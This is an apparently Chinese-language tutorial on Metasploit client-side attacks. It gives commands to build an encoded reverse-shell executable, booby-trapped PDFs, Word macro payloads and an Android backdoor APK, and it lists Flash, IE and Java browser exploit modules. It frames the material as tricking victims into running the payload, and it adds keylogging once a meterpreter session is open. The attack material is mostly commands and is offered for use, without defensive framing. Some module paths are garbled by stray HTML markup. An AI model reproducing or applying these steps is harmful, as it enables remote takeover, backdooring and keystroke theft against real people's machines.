思路举例:
诱骗被害者执行Payload,先生成可执行程序:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
将可执行程序发送到客户端等待客户端运行,同时本地msf侦听开启:
- msfconsole -q
- use exploit/multi/handler
- set payload windows/shell/reverse_tcp
- set LHOST 1.1.1.1
- set LPORT 4444
- exploit
含有漏洞利用代码的DOC、PDF等文档,举例:
(PDF阅读器利用下面的客户端程序的漏洞实现攻击)
利用Acrobat Reader漏洞执行Payload
首先构造PDF文件:
- exploit/windows/fileformat/adobe_utilprintf
- set payload meterpreter/reverse_tcp
- set lhost
- set lport
- run
被攻击者的电脑的阅读器如果存在漏洞,那么将被执行成功取得shell。
扩展:当取得meterpreter后,可以执行例如以下命令对目标的控制:
- use priv
- run post/windows/capture/keylog_recorder (知道对方正在敲击的键盘)
利用Flash插件漏洞执行payload(要对应相同的版本)
- use exploit-operator">/multi-operator">/browser-operator">/adobe_flash_hacking_team_uaf
- use exploit-operator">/multi-operator">/browser-operator">/adobe_flash_opaque_background_uaf
利用IE浏览器漏洞执行payload
use exploit-operator">/windows-operator">/browser-operator">/ms14_064_ole_code_execution
利用JRE漏洞执行payload
- use exploit-operator">/multi-operator">/browser-operator">/java_jre17_driver_manager
- use exploit-operator">/multi-operator">/browser-operator">/java_jre17_jmxbean
- use exploit-operator">/multi-operator">/browser-operator">/java_jre17_reflection_types
生成Android后门程序
- use payload/android/meterpreter/reverse_tcp
- generate -f -selector-tag">a.apk --selector-tag">p android -t raw
VBScript感染方式:
利用宏感染word、Excel文档,从而绕过某些基于文件类型检查的安全机制
先生成VBScript脚本:
msfvenom -a x86 --platform windows -p windows/ meterpreter/reverse_tcp LHOST=172.20.10.11 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
再在文档中添加生成的payload:
:视图---->宏---->创建
payload第一部分粘入VBA代码;
payload第二部分(data)粘入word文档正文;
最后Msf启动侦听
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
只要被攻击者点击文档,那么就能够取得shell。
网站声明:如果转载,请联系本站管理员。否则一切后果自行承担。
加入交流群
请使用微信扫一扫!